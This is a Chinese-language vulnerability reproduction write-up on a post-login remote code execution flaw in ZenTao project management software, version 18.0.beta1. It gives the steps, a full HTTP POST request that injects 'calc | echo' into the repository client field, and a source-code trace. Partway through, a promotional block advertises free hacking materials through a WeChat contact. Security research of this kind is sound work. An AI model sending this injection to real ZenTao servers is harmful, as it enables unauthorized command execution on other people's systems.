漏洞簡介
禪道是第一款國產的開源項目管理軟件。它集產品管理、項目管理、質量管理、文檔管理、 組織管理和事務管理於一體,是一款專業的研發項目管理軟件,完整地覆蓋了項目管理的核心流程。 禪道管理思想注重實效,功能完備豐富,操作簡潔高效,界面美觀大方,搜索功能強大,統計報表豐富多樣,軟件架構合理,擴展靈活,有完善的 API 可以調用。
禪道後臺存在 RCE 漏洞,均存在於歷史版本,對這些漏洞進行復現分析。
環境搭建
源碼下載地址 https://dl.cnezsoft.com/zentao/18.0.beta1/ZenTaoPMS.18.0.beta1.php7.2_7.4.zip
利用 phpstudy 來進行環境的搭建
漏洞復現
登錄後臺創建 GitLab 類型的代碼庫
點擊 DevOps 模塊的設置選項,修改創建的代碼庫
點擊保存並抓取數據包
修改參數 SCM 和 client SCM 修改爲 Subversion client 修改爲 calc | echo "
觸發了命令執行,執行了兩次
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備註 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
漏洞分析
發現有一些分析文章中描述需要先創建一個代碼倉庫,也指出了創建代碼倉庫的原因,因爲調用的是 edit 方法,所以要先 create
經過調試發現這是必須的,因爲在沒創建代碼庫時,執行 edit 方法,會提示跳轉去創建代碼庫
module/repo/control.php#commonAction
所以需要先創建代碼庫
module/repo/control.php#create
module/repo/model.php#create
在創建代碼庫的時候有一個檢查 Client 的操作 只有選擇 Gitlab 才能不做客戶端的檢測操作,直接創建成功
module/repo/model.php#checkClient
創建成功後執行編輯操作觸發漏洞
POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1
Host: test.test
Content-Length: 36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=repo&f=edit&repoID=1&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; windowWidth=1440; windowHeight=722; tab=devops; repoBranch=master;XDEBUG_SESSION=PHPSTORM
Connection: close
SCM=Subversion&client= calc | echo "module/repo/control.php#edit
module/repo/model.php#update
module/repo/model.php#checkConnection
修復建議
更新至最新版本
更多網安技能的在線實操練習,請點擊這裏>>